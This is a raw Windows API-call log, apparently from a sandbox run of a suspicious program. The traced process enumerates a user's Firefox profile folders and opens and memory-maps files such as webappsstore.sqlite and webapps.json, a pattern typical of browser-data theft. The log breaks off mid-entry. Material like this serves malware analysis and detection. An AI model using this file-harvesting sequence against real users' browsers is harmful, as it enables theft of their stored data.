[0590.803] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.803] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.803] lstrlenW (lpString="\\") returned 1 [0590.803] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.803] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.803] lstrlenW (lpString="urlclassifierkey3.txt") returned 21 [0590.803] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.803] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x5e6108 [0590.803] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.803] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.803] CloseHandle (hObject=0x5ac) returned 1 [0590.803] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x62 [0590.803] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x63f8c8 [0590.803] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x63f8c8, nSize=0x62 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt") returned 0x62 [0590.803] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.804] CloseHandle (hObject=0x5ac) returned 1 [0590.804] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.804] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9a [0590.804] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.804] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.804] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.804] LocalFree (hMem=0x5e6108) returned 0x0 [0590.804] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.804] lstrcmpiW (lpString1="weave", lpString2=".") returned 1 [0590.804] lstrcmpiW (lpString1="weave", lpString2="..") returned 1 [0590.804] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.804] lstrlenW (lpString="\\") returned 1 [0590.804] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.804] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.804] lstrlenW (lpString="weave") returned 5 [0590.804] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.804] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x63bbf0 [0590.804] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.804] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.804] lstrlenW (lpString="\\*.*") returned 4 [0590.804] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.804] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bd28 [0590.804] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\*.*", lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 0x57ca60 [0590.804] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.804] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 1 [0590.804] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.804] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.804] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 1 [0590.804] lstrcmpiW (lpString1="changes", lpString2=".") returned 1 [0590.804] lstrcmpiW (lpString1="changes", lpString2="..") returned 1 [0590.804] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.804] lstrlenW (lpString="\\") returned 1 [0590.804] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.805] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63be60 [0590.805] lstrlenW (lpString="changes") returned 7 [0590.805] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.805] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.805] LocalFree (hMem=0x63be60) returned 0x0 [0590.805] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0590.805] lstrlenW (lpString="\\*.*") returned 4 [0590.805] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0590.805] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dbdf0 [0590.805] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes\\*.*", lpFindFileData=0x52dae8 | out: lpFindFileData=0x52dae8) returned 0x57c9a0 [0590.805] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.805] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dae8 | out: lpFindFileData=0x52dae8) returned 1 [0590.805] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.805] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.805] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dae8 | out: lpFindFileData=0x52dae8) returned 0 [0590.805] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.805] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.805] LocalFree (hMem=0x56cab0) returned 0x0 [0590.805] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 1 [0590.805] lstrcmpiW (lpString1="failed", lpString2=".") returned 1 [0590.805] lstrcmpiW (lpString1="failed", lpString2="..") returned 1 [0590.805] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.805] lstrlenW (lpString="\\") returned 1 [0590.805] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.805] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63be60 [0590.805] lstrlenW (lpString="failed") returned 6 [0590.805] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.805] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.805] LocalFree (hMem=0x63be60) returned 0x0 [0590.805] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0590.805] lstrlenW (lpString="\\*.*") returned 4 [0590.805] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0590.805] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dbdf0 [0590.805] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed\\*.*", lpFindFileData=0x52dae8 | out: lpFindFileData=0x52dae8) returned 0x57c9a0 [0590.805] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.805] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dae8 | out: lpFindFileData=0x52dae8) returned 1 [0590.805] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.805] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.805] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dae8 | out: lpFindFileData=0x52dae8) returned 0 [0590.805] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.805] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.805] LocalFree (hMem=0x56cab0) returned 0x0 [0590.805] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 1 [0590.805] lstrcmpiW (lpString1="toFetch", lpString2=".") returned 1 [0590.805] lstrcmpiW (lpString1="toFetch", lpString2="..") returned 1 [0590.805] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.806] lstrlenW (lpString="\\") returned 1 [0590.806] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.806] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63be60 [0590.806] lstrlenW (lpString="toFetch") returned 7 [0590.806] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.806] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.806] LocalFree (hMem=0x63be60) returned 0x0 [0590.806] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0590.806] lstrlenW (lpString="\\*.*") returned 4 [0590.806] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0590.806] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dbdf0 [0590.806] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch\\*.*", lpFindFileData=0x52dae8 | out: lpFindFileData=0x52dae8) returned 0x57c9a0 [0590.806] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.806] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dae8 | out: lpFindFileData=0x52dae8) returned 1 [0590.806] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.806] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.806] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dae8 | out: lpFindFileData=0x52dae8) returned 0 [0590.806] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.806] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.806] LocalFree (hMem=0x56cab0) returned 0x0 [0590.806] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 0 [0590.806] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.806] LocalFree (hMem=0x63bd28) returned 0x0 [0590.806] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.806] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.806] lstrcmpiW (lpString1="webapps", lpString2=".") returned 1 [0590.806] lstrcmpiW (lpString1="webapps", lpString2="..") returned 1 [0590.806] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.806] lstrlenW (lpString="\\") returned 1 [0590.806] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.806] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.806] lstrlenW (lpString="webapps") returned 7 [0590.806] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.806] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bbf0 [0590.806] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.806] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.806] lstrlenW (lpString="\\*.*") returned 4 [0590.806] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.806] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.806] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\*.*", lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 0x57ca60 [0590.806] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.806] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 1 [0590.806] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.807] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.807] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 1 [0590.807] lstrlenW (lpString="\\") returned 1 [0590.807] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.807] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63be60 [0590.807] lstrlenW (lpString="webapps.json") returned 12 [0590.807] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\") returned 84 [0590.807] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5e6108 [0590.807] LocalFree (hMem=0x63be60) returned 0x0 [0590.807] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.807] CloseHandle (hObject=0x4c8) returned 1 [0590.807] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0590.807] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x63f8c8 [0590.807] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x63f8c8, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json") returned 0x61 [0590.807] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.807] CloseHandle (hObject=0x4c8) returned 1 [0590.807] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.807] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2 [0590.807] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.807] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.807] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.807] CloseHandle (hObject=0x660) returned 1 [0590.807] CloseHandle (hObject=0x4c8) returned 1 [0590.808] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.808] LocalFree (hMem=0x5e6108) returned 0x0 [0590.808] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 0 [0590.808] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.808] LocalFree (hMem=0x63bd28) returned 0x0 [0590.808] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.808] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.808] lstrlenW (lpString="\\") returned 1 [0590.808] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.808] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.808] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0590.808] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.808] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56cab0 [0590.808] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.808] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.808] CloseHandle (hObject=0x5ac) returned 1 [0590.808] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0590.808] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x5dbdf0 [0590.808] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x5dbdf0, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite") returned 0x60 [0590.808] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.808] CloseHandle (hObject=0x5ac) returned 1 [0590.808] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.808] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0590.808] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.808] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.809] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.809] CloseHandle (hObject=0x4c8) returned 1 [0590.809] CloseHandle (hObject=0x5ac) returned 1 [0590.810] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.810] LocalFree (hMem=0x56cab0) returned 0x0 [0590.810] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 0 [0590.810] FindClose (in: hFindFile=0x57d1e0 | out: hFindFile=0x57d1e0) returned 1 [0590.810] LocalFree (hMem=0x63d6b0) returned 0x0 [0590.810] LocalFree (hMem=0x63d588) returned 0x0 [0590.810] lstrlenW (lpString="Profile0") returned 8 [0590.810] LocalFree (hMem=0x2edc8d0) returned 0x0 [0590.810] LocalFree (hMem=0x2eec748) returned 0x0 [0590.811] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.811] LocalFree (hMem=0x2ed2ba0) returned 0x0 [0590.811] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.811] lstrlenW (lpString="*.*") returned 3 [0590.811] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.811] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5e6f98 [0590.811] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*.*", lpFindFileData=0x52dfe0 | out: lpFindFileData=0x52dfe0) returned 0x57d1e0 [0590.811] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.811] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfe0 | out: lpFindFileData=0x52dfe0) returned 1 [0590.811] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.811] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.811] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfe0 | out: lpFindFileData=0x52dfe0) returned 1 [0590.811] lstrcmpiW (lpString1="Crash Reports", lpString2=".") returned 1 [0590.811] lstrcmpiW (lpString1="Crash Reports", lpString2="..") returned 1 [0590.811] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.811] lstrlenW (lpString="") returned 0 [0590.811] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.811] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2ba0 [0590.811] lstrlenW (lpString="Crash Reports") returned 13 [0590.811] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.811] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x5d7c90 [0590.811] LocalFree (hMem=0x2ed2ba0) returned 0x0 [0590.811] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0590.811] lstrlenW (lpString="\\*.*") returned 4 [0590.811] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0590.811] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5ed570 [0590.812] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*.*", lpFindFileData=0x52dd68 | out: lpFindFileData=0x52dd68) returned 0x57ca60 [0590.812] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.812] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd68 | out: lpFindFileData=0x52dd68) returned 1 [0590.812] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.812] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.812] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd68 | out: lpFindFileData=0x52dd68) returned 1 [0590.812] lstrlenW (lpString="\\") returned 1 [0590.812] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0590.812] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed688 [0590.812] lstrlenW (lpString="InstallTime20131025151332") returned 25 [0590.812] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 64 [0590.812] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.812] LocalFree (hMem=0x5ed688) returned 0x0 [0590.812] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.812] CloseHandle (hObject=0x4c8) returned 1 [0590.812] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.812] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 